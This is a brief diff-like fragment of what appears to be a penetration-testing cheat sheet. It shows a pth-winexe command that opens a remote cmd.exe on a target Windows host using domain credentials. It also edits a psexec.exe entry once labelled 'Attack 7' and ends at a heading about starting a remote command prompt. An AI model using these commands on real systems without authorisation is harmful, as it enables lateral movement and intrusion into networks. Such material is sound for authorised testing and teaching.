Skip to main content

 pth-winexe --user='domain.tld/user.name%password' //target-ip cmd.exe

-Attack 7: psexec.exe
+psexec.exe

-Requires transfer or download of psexec.exe to a compromised Windows host
+Requires psexec.exe binary on a Windows host

 # Start a remote command prompt